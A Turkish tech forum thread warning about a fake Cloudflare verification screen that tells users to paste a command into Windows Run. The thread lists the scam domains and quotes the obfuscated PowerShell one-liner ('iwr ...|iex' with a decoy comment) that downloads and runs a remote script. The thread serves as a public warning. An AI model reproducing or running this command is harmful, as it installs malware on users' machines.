Bu konu çözüldü olarak işaretlenmiştir. Çözülmediğini düşünüyorsanız konuyu rapor edebilirsiniz.
Detaylar
Kim cevapladı?
Çözüm
Cloudflare güvenilir bir site. Dünyanın en büyük güvenlik duvarı diyebilirim hatta. Lakin bu görsel bana biraz şüpheli geldi.
Güncelleme: Sakın yapmayın, virüs yersiniz. %100 fake/scam.
- Ben hayatımda hiç böyle komut yapıştırmalı bir doğrulama yöntemi görmedim.
- Metinde noktalardan önce boşluk var.
- Windows + R tuşuna basılı tutulmaz. Bu yönergede de hata var.
Güncelleme: Sakın yapmayın, virüs yersiniz. %100 fake/scam.
Kod:
api.bittypejumpshopbest.com
bittypejumpshopbest.com
877903.tinttrends.co
KakaoluKekAdam
Yetkin
Sahte Cloudflare ekranı.
Son düzenleme:
Ben ettim bileAbuse mail adresi belirlemişler. Birazdan kendi mail sunucumdan domainleri şikayet edeyim. Bazen işe yarıyor.
Şikayetime cevap geldi:
Bir mail daha atıp video çekmemi istediler ama uğraşacak vaktim yok.
Son düzenleme:
- Makaleler
- 14
Kanıt istiyorlar galiba. Direkt komutu Windows bilgisayarlarında çalıştırsınlar bence daha iyi bir kanıt olur.Bir mail daha atıp video çekmemi istediler ama uğraşacak vaktim yok.
Ugün aynı durum benim de başıma geldi. Cloudflare ekranı göründü ve her zamanki normal bir doğrulama sanmıştım. Ancak ekranda, doğrulama için terminali açıp CTRL + V yapmam gerektiği yazıyordu. Yapıştırmam istenen kod
iwr s"an"D"r"AA"a-"m"az"u"r"r"r. S"i"t"e|iex #Cloudflare X Microsoft DeviceTrust | Integrity Check Module [build 2134-WC] idi. Kodu incelediğimde, # işaretinden sonrası yalnızca dikkat dağıtmak için yazıldığını, asıl önemli kısmın iwr s"an"D"r"AA"a-"m"az"u"r"r"r. S"i"t"e|iex olduğunu fark ettim. ChatGPT'ye sorduğumda, tırnak içindeki adresten bir script indirip çalıştırdığını öğrendim. Az kalsın ben de kanacaktım.
Son düzenleyen: Moderatör:
@Recep Baltaş hocam şu siteyi de raporlama şansınız var mı acaba? Sizin bir yere şikayet ettiğiniz aklıma geldi de, size atayım dedim.
Az önce x sitesinden bu virüsü yedim
Tam tarama yapıyorum şu anda.
Son düzenleyen: Moderatör: